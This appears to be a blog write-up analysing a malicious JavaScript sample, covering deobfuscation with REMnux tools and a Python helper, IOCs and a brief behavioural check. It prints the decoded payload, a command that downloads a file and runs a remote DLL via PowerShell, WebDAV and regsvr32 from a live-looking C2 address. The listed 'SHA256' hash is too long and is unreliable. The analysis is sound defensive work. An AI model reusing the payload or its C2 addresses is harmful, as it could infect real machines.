## Malware Analysis -- JavaScript Deobfuscation
#### Intro
I recently started conducting some malware analysis, and I found myself particularly intrigued by a section focused on JavaScript code analysis. I thought it would be the perfect opportunity to dive deeper and sharpen my skills by working with real-world examples. So, here’s a quick and straightforward analysis to get started!
#### Sample
- I obtained a real sample from [MalwareBazaar](https://bazaar.abuse.ch/sample/811f1a8e96e8f6421f233b537064b16850df7ff043b722161a74124e7781d7c6/)
#### Tools
1. REMnux - Linux
2. Ghost Windows 10 (contains my own malware analysis tools)
#### Static Analysis
SHA256 hash: `58d9dfb6906f5d06e85773461bd8ecc23f836a73dc0ef98a537e2385faeaaf43cbf5c548e7564bf7c3a09fcbc01259a2`
Well, let's give it a first look in `Notepad++`.


#### Observations
1. The actual code that will execute is at the beginning of the script.
2. Many variables are used to obfuscate the code (each variable contains many characters), so our mission is to find the pattern by which the code is built from that obfuscation.
#### Deobfuscation with `SpiderMonkey`
Let's try to deobfuscate it with the `spidermonkey` tool in REMnux.
```
js -f sample.js
```
It didn't work well for deobfuscation, but it gave us one clue: an `eval` function at **line 21**.

So, I tried `box-js`, as it helps emulate the runtime components (such as faking the URLs the malware tries to reach).
```
box-js sample.js --download
```
When checking `IOC.json` and the rest of the files, it observed only that a registry key was being written, but the other files contained weird scripts that weren't related to the malware :XD.
#### Manual Deobfuscation
I will replace each variable with a readable `"charX"`, where X is an incrementing number, just to make it more readable.
Example:
```
this[mqihfsol+olhntqaar+igjpssh+hevjsqi+tslwgc+mkutxa+qmqctvq] == this[char1+char2+char3+char4+char5+char6+char7]
```
The final one is much easier to parse.

Now, there are many variables, each 28-45 characters long, and we need to find which character will be used before running the script.
So, I started looking for something the script must include, `http://`, and I found this:
```
http:// == char15+char7+char7+char6+char38+char20+char20
```
Then I started looking at the values of each char; they are in sequences, I mean this:

**And confirmed that the script uses the last char of each variable.**

So, we now only need to replace each variable with its last char.
**After replacement:**

```
func=var0[ev "" al];func("array=[10374,12422,14470,13446,11398,12415];var2=this[WScript][CreateObject](WScript.Shell);var3=cmd /c powershell.exe -Command \Invoke-WebRequest -OutFile %temp%\\invoice.pdf http:// 193.143.1.205/invoice.php\&&start %temp%\\invoice.pdf&&cmd /c net use \\\\193.143.1.205@8888\\davwwwroot\\&&cmd /c regsvr32 /s \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll;var4 = var0[parseInt](var2[RegRead](HKLM_CURRENT_USER\\Control panel\\International\\Locale), 88);var4=9343;for(var1=0;var1<array[length];var1){if(var4 === array[var1]){var2[run](var3,0,0);break;}}")
```
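The two manual steps above (rename the opaque variables to `charN`, then collapse each `a+b+c` chain inside square brackets into the string of each variable's last character) as an added Python helper; this is my example, not the post's code or the malware itself, and `SAMPLE` is a constructed snippet in the same style, with the variable names from the post but made-up filler values.

```python
import re

# Constructed sample in the style of the analysed script (NOT the real malware):
# each variable is a long filler string and only its LAST character is used.
SAMPLE = '''
var mqihfsol = "zkq lpw mvn rty bdx ghs ujW";
var olhntqaar = "aeiou qwerty zxcvb nmlkj S";
var igjpssh = "lorem ipsum dolor sit amet c";
var hevjsqi = "the quick brown fox jumps r";
var tslwgc = "pack my box with five dozen i";
var mkutxa = "sphinx of black quartz judge p";
var qmqctvq = "how vexingly quick daft zebras t";
var shell = this[mqihfsol+olhntqaar+igjpssh+hevjsqi+tslwgc+mkutxa+qmqctvq];
'''

VAR_RE = re.compile(r'\bvar\s+(\w+)\s*=\s*"([^"]*)"\s*;')
# a+b+c chain inside square brackets (at least two operands)
CHAIN_RE = re.compile(r'\[\s*(\w+(?:\s*\+\s*\w+)+)\s*\]')

def collect_vars(src):
    """Map every string variable in the script to its literal value."""
    return dict(VAR_RE.findall(src))

def rename_vars(src, variables):
    """Step 1 of the write-up: rename each opaque variable to char1, char2, ..."""
    if not variables:
        return src
    mapping = {name: f"char{i}" for i, name in enumerate(variables, 1)}
    pattern = re.compile(r'\b(' + '|'.join(map(re.escape, mapping)) + r')\b')
    return pattern.sub(lambda m: mapping[m.group(1)], src)

def decode_chain(chain, variables):
    """Step 2: resolve a+b+c to the string of each variable's last character."""
    parts = [p.strip() for p in chain.split('+')]
    if not all(p in variables and variables[p] for p in parts):
        return None  # unknown or empty operand: leave the expression alone
    return ''.join(variables[p][-1] for p in parts)

def deobfuscate(src):
    """Replace every bracketed concatenation chain with the decoded string literal."""
    variables = collect_vars(src)

    def repl(m):
        decoded = decode_chain(m.group(1), variables)
        return m.group(0) if decoded is None else f'["{decoded}"]'

    return CHAIN_RE.sub(repl, src)
```

Running `print(deobfuscate(SAMPLE))` rewrites the bracketed chain to `this["WScript"]`; chains containing a name that is not a string variable are left untouched so nothing is resolved by guesswork.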
#### IOCs
```
1. http://193.143.1.205/invoice.php\&&start %tmp%\\invoice.pdf
2. \\\\193.143.1.205@8888\\davwwwroot\\
3. \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll
4. HKLM_CURRENT_USER\\Control panel\\International\\Locale
```
#### Behavioural Analysis
Let's ping the C2 to see if it is active.

Yes, it is. Now let's download `invoice.php`, which will be saved as `%tmp%\\invoice.pdf`.

It is a PDF; when I parsed it with `pdf-parser.py`, it didn't contain any JS code, and I confirmed that with VirusTotal.


So, let's look further and try to download the DLL `100758775027.dll`.
But the server was off.

So, our analysis concludes here.
See you! 🚀